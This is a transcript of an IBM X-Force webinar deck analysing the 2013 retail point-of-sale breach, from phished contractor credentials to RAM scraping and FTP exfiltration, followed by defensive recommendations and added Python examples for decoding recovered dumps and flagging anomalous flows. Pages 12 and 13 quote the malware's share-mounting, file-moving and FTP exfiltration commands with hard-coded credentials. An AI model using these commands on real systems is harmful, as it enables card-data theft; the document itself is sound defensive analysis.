Anatomy of an Advanced Retail Breach

Chris Poulin, Research Strategist, X-Force, IBM Security Systems. February 2014.
Posted: 14-Sep-2014

Category: Technology

Description

The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks. View the full on-demand webcast: https://www2.gotomeeting.com/register/537536362

Transcript of Anatomy of an Advanced Retail Breach

Page 1: Anatomy of an Advanced Retail Breach

© 2014 IBM Corporation

IBM Security Systems

Anatomy of an Advanced Retail Breach

Chris Poulin, Research Strategist, X-Force

February 2014

Page 2: Anatomy of an Advanced Retail Breach


Agenda

About the IBM X-Force

Dissection of a retail attack and data breach

Solutions to prevent similar compromises

Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.

Page 3: Anatomy of an Advanced Retail Breach


X-Force is the foundation for advanced security and threat research across the IBM Security Framework

The mission of X-Force is to:

Monitor and evaluate the rapidly changing threat landscape

Research new attack techniques and develop protection for tomorrow’s security challenges

Educate our customers and the general public

Page 4: Anatomy of an Advanced Retail Breach


Collaborative IBM teams monitor and analyze the changing threat landscape

Coverage

20,000+ devices under contract

3,700+ managed clients worldwide

15B+ events managed per day

133 monitored countries (MSS)

1,000+ security related patents

Depth

17B analyzed web pages & images

40M spam & phishing attacks

73K documented vulnerabilities

Billions of intrusion attempts daily

Millions of unique malware samples

Page 5: Anatomy of an Advanced Retail Breach


Anatomy of the Breach

1. Attacker phishes a 3rd party contractor

2. Attacker uses stolen credentials to access contractor portals

3a. Attacker finds & infects internal Windows file server

3b. Attacker finds & infects POS systems w/malware

4. Malware scrapes RAM for clear text CC stripe data

5. Malware sends CC data to internal server; sends custom ping to notify

6. Stolen data is exfiltrated to FTP servers

Diagram nodes: contractor portals, retailer POS systems, retailer Windows file server, firewall, internal network, attacker FTP servers (external/Russia)

Page 6: Anatomy of an Advanced Retail Breach


1. Phish a 3rd Party Contractor

HVAC firm in PA

Email malware campaign

Citadel password stealing bot, variant of Zeus banking trojan

Primary method of malware detection: free version of Malwarebytes Anti-Malware

On-demand scanning; not for commercial use

Supplier portal contains lots of public information

– Example: list of resources for HVAC companies

Diagram callout 1: Attacker phishes a 3rd party contractor

Page 7: Anatomy of an Advanced Retail Breach


2. Access & exploit contractor portal

Diagram callout 2: Attacker uses stolen credentials to access contractor portal

Contractor portals shown on the slide:

– pdzone.retailer.com, 61.225.130.104, NS @ retailer.com

– amlogin.ewips.partnersonline.com, 161.225.202.98, NS @ retailer.com

– service.ariba.com, 216.109.104.11, NS @ ariba.com

Contractors generally not required to use token or other 2-factor authentication

Page 8: Anatomy of an Advanced Retail Breach


3a. Discover & exploit internal file server

Exact method of movement from portal to internal server unknown

Probably not HVAC partner—cloud-based, not on retailer extranet

Back-end connect from partner portal or other retailer owned asset?

SQL injection, browser exploit, open ingress port, who knows?

Or maybe contractors had access to internal network to monitor HVAC systems remotely

Diagram callout 3a: Attacker finds & infects internal Windows file server (retailer Windows file server)

Page 9: Anatomy of an Advanced Retail Breach


3a. Discover & exploit internal file server (cont’d)

Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata

– Created by username John.Doe

– Printed recently on Windows \\DOMAIN\

Google search easily reveals location of retail datacenters

Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers)

– Username=“Best1_user”; password=“BackupU$r”

– Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC

– Installed as “BladeLogic”, hiding as a BMC component (BladeLogic Automation Suite); however, BMC doesn’t name any component “bladelogic.exe”

– System / Administrator level account; can run batch jobs

Diagram callout 3a: Attacker finds & infects internal Windows file server (retailer Windows file server)

Page 10: Anatomy of an Advanced Retail Breach


3b. Find & infect POS systems

Diagram callout 3b: Attacker finds & infects POS systems w/malware (retailer Windows file server → retailer POS systems)

With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns.

Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/

Page 11: Anatomy of an Advanced Retail Breach


4. Malware scrapes card data from RAM

Trojan.POSRAM, variant of BlackPOS

No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure

Looks for the “pos.exe” process

Installs the trojan and creates registry entries containing the string “POSWDS”

Scrapes RAM for track 1 and track 2 data of financial cards

Card track data is encrypted

– between the reader and the POS, and

– again between the POS and the payment processor

Unencrypted momentarily at the POS as the transaction is cleared

Debit card PINs are hashed at the card reader

Chip-and-PIN encrypts the transaction from the card to the processor

Stores stolen card data in file %SystemRoot%\system32\winxml.dll

Diagram callout 4: Malware scrapes RAM for clear text CC stripe data (retailer POS systems)

Page 12: Anatomy of an Advanced Retail Breach


5. Harvested card data is sent to internal rally point

Moves stolen card data to a central collection point

Assumes POS systems have no internet access

Creates temp Windows share on domain

Malware on rally point creates share in %windir%\twain_32

Encodes base64 with a custom alphabet (encoding string):

JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau

Moves winxml.dll to \\<RallyPoint>_<Day>_<Mon>_<Hr>.txt

POS malware sends a custom ICMP packet as a semaphore

Diagram callout 5: Malware sends CC data to internal server; sends custom ping to notify (retailer POS systems → retailer Windows file server)

Commands shown on the slide:

net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$r
move %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt
net use S: /del
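The encoding string on this slide is a permutation of the standard base64 alphabet, so an analyst who recovers a dump file from the rally point can decode it by translating the alphabet back before a normal base64 decode. The following Python is an added example, not IBM's code or anything from the malware: it decodes a dump and counts distinct Luhn-valid PANs in the track data, the impact measure Page 19 asks for; the ISO 7813 track layout, unchanged '=' padding and the sample dump are constructed assumptions.

```python
import base64
import re

# Custom base64 alphabet quoted on the slide for the rally-point malware
CUSTOM_ALPHABET = b"JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau"
STD_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
assert len(CUSTOM_ALPHABET) == 64 and len(set(CUSTOM_ALPHABET)) == 64

# Translation tables: the custom alphabet is a permutation of the standard one
TO_STD = bytes.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)
TO_CUSTOM = bytes.maketrans(STD_ALPHABET, CUSTOM_ALPHABET)

# Track 1 starts "%B<PAN>^", track 2 starts ";<PAN>=" (assumed ISO 7813 layout)
PAN_RE = re.compile(rb"(?:%B|;)(\d{13,19})[\^=]")


def decode_custom_b64(blob: bytes) -> bytes:
    """Map the custom alphabet back to standard base64, then decode.
    Assumes '=' padding is used unchanged (an assumption, not from the slide)."""
    return base64.b64decode(blob.translate(TO_STD))


def encode_custom_b64(raw: bytes) -> bytes:
    """Inverse mapping; used here only to build the constructed test fixture."""
    return base64.b64encode(raw).translate(TO_CUSTOM)


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit test, to separate real PANs from random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def count_affected_cards(encoded_dump: bytes) -> dict:
    """Decode a recovered dump file and count distinct PANs for impact analysis."""
    decoded = decode_custom_b64(encoded_dump)
    pans = {m.group(1).decode() for m in PAN_RE.finditer(decoded)}
    valid = {p for p in pans if luhn_ok(p)}
    return {"unique_pans": len(pans), "luhn_valid": len(valid),
            "luhn_invalid": len(pans - valid)}


# Constructed sample: three swipes using test-card numbers, one with a bad check digit
SAMPLE_DUMP = (
    b"%B4111111111111111^DOE/JOHN^2512101000000000000?\n"
    b";4111111111111111=25121010000000000000?\n"
    b";5555555555554444=26011010000000000000?\n"
    b";4111111111111112=24071010000000000000?\n"
)
ENCODED_SAMPLE = encode_custom_b64(SAMPLE_DUMP)
```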

Page 13: Anatomy of an Advanced Retail Breach


6. Card data is exfiltrated to FTP servers in Russia

Compiles all card dumps into c:\windows\twain_32a.dll

Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin

Generates an FTP script and executes ftp -s <path>\\cmd.txt

Diagram callout 6: Stolen data is exfiltrated to FTP servers (retailer Windows file server → attacker FTP servers, external/Russia)

Page 14: Anatomy of an Advanced Retail Breach


Protect endpoints

The ultimate prize:

– POS systems: where the card data is processed

– File servers: base of operations

– Web servers: initial incursion vector

– Contractor workstations: intelligence, credentials

Malware protection:

– Contractor workstations (phishing, Citadel bot)

– POS systems: RAM scraper trojan

– File servers: data management and exfiltration tools

– Application isolation (Intel SGX, micro-virtualization, etc.) to prevent RAM scraping

Patch

Configuration management

Page 15: Anatomy of an Advanced Retail Breach


Protection against web and file server compromises

Secure development lifecycle (SDLC)

– Secure coding practices training

– Static/source code analysis—manual (code review) and automated

– Dynamic code analysis (especially the low-hanging fruit: SQL injection & XSS)

– Include compiled application, web applications, mobile apps

Go-live security process

– Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)

– Install appropriate endpoint protection and configuration management

– Vulnerability scan

Appropriate authentication

– Separate domains / administrative credentials (identity separation)

– Multi-factor authentication

Page 16: Anatomy of an Advanced Retail Breach


Enumerate & classify

Restrict web assets’ access to internal systems

Isolate public / partner facing assets from private assets

Segment operational technology (OT), critical assets, and general IT

Perform firewall rule analysis, paying special attention to:

– assets containing sensitive data, such as cardholder information

– risky protocols and flow directions

For example, POS systems shouldn’t

– mount Windows shares, or

– send regular ICMP packets

Segment critical assets

Image source: http://nationalgeographic.com

Page 17: Anatomy of an Advanced Retail Breach


Monitor & detect: network

Network activity pattern monitoring can detect:

– Suspicious scanning activity as attacker maps out the network landscape

– Policy violations for outbound FTP, especially to Eastern Bloc countries

Network packet inspection can detect:

– IPS can stop SQL injection, XSS, other more advanced attacks

– Credit card number patterns in outbound data

– Suspect strings in ICMP packets

– Identify network traffic that is not what it seems, e.g.:

• Non-DNS protocol over port 53

• IRC over port 80

Page 18: Anatomy of an Advanced Retail Breach


Monitor & detect: vulnerability and anomaly detection

Vulnerability scanning, including deep endpoint assessment

– example: registry entries containing “POSWDS”

Anomaly detection

– Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)

– Detect deviations from baseline:

• POS connecting to Windows shares

• POS emitting ICMP packets

– General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP

– Profile ICMP packet sizes and normal payload contents; identify & block deviations
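As an added example (not from the IBM deck or any product), the following Python applies the three baseline rules from Pages 16 to 18 to constructed flow records: POS hosts opening SMB shares, POS hosts emitting ICMP with payload sizes outside the profiled baseline, and internal hosts sending FTP to the internet. The subnets, baseline sizes and log lines are assumptions built for the example.

```python
import ipaddress

# Asset classes, constructed for this example; in practice they come from the
# enumerate & classify step (Page 16) and a CMDB, not from a hard-coded list.
POS_NET = ipaddress.ip_network("10.20.0.0/16")          # point-of-sale VLAN
INTERNAL_NETS = (ipaddress.ip_network("10.0.0.0/8"),)   # everything private
ICMP_BASELINE_BYTES = {32, 56, 64}  # constructed baseline of normal ping sizes


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flow(line: str) -> dict:
    """One constructed flow record: ts,src,dst,proto,dport,bytes."""
    ts, src, dst, proto, dport, nbytes = line.split(",")
    return {"ts": ts, "src": src, "dst": dst, "proto": proto,
            "dport": int(dport), "bytes": int(nbytes)}


def classify_flow(rec: dict) -> list:
    """Return the names of the baseline rules this flow violates."""
    src_is_pos = ipaddress.ip_address(rec["src"]) in POS_NET
    hits = []
    # Page 16: POS systems should never mount Windows shares
    if src_is_pos and rec["proto"] == "tcp" and rec["dport"] in (139, 445):
        hits.append("pos-smb-share")
    # Page 18: ICMP from a POS with a payload size outside the profile
    if src_is_pos and rec["proto"] == "icmp" and rec["bytes"] not in ICMP_BASELINE_BYTES:
        hits.append("pos-icmp-anomaly")
    # Page 17: outbound FTP from any internal host is a policy violation
    if (is_internal(rec["src"]) and not is_internal(rec["dst"])
            and rec["proto"] == "tcp" and rec["dport"] == 21):
        hits.append("outbound-ftp")
    return hits


def scan_flows(lines) -> list:
    """Run every rule over the flow log; returns (ts, src, dst, rule) tuples."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rec = parse_flow(line)
        alerts.extend((rec["ts"], rec["src"], rec["dst"], r) for r in classify_flow(rec))
    return alerts


# Constructed flow records mirroring steps 5 and 6 of the breach
SAMPLE_FLOWS = """\
# ts,src,dst,proto,dport,bytes
2013-12-02T03:15:01,10.20.4.17,10.1.1.50,tcp,445,18432
2013-12-02T03:15:02,10.20.4.17,10.1.1.50,icmp,0,183
2013-12-02T03:16:00,10.20.4.18,10.1.1.50,icmp,0,64
2013-12-02T03:20:10,10.20.4.18,10.1.1.7,tcp,443,2210
2013-12-02T04:00:00,10.1.1.50,203.0.113.9,tcp,21,7340032
2013-12-02T04:01:00,10.1.1.7,10.1.1.50,tcp,445,4096
""".splitlines()
```

Only the three flows that break a rule are reported; the normal-sized ping, the HTTPS session and the file-server-to-file-server SMB flow stay silent.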

Page 19: Anatomy of an Advanced Retail Breach


Incident Response

Speedy and complete forensics

– early in the process if the compromise is detected before data is stolen, or

– after a severe breach when accurate impact analysis is critical:

• Which systems were compromised?

• How many customers were affected?

• How much of the data comprised personal information?

Instrument everything feasible

– include POS systems and network activity

– enrich with context from

• vulnerability assessment tools

• change management transactions

• security intelligence feeds

Page 20: Anatomy of an Advanced Retail Breach


Incident / emergency response

Plan should include

– Detection

– Response and escalation

– Engaging law enforcement as appropriate

– Preservation of evidence

– Compliance with regulations and contractual agreements

– Customer and press notification

– Public relations

Engage your contracted external emergency response agency in advance

– Help you prepare for a breach, and

– Gather context about your environment

Test your process regularly

Business associate contract and assessment

Page 21: Anatomy of an Advanced Retail Breach


At IBM, the world is our security lab

6,000 IBM researchers, developers, and subject matter experts, ALL focused on security

More than 3,000 IBM security patents

Security Operations Centers

Security Research and Development Labs

Institute for Advanced Security Branches

Page 22: Anatomy of an Advanced Retail Breach


Get Engaged with IBM X-Force Research and Development

Follow us at @ibmsecurity and @ibmxforce

Subscribe to X-Force alerts at iss.net/rss.php or the IBM Security blog at www.securityintelligence.com

Download X-Force security trend & risk reports: http://www.ibm.com/security/xforce/

Page 23: Anatomy of an Advanced Retail Breach


www.ibm.com/security

© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
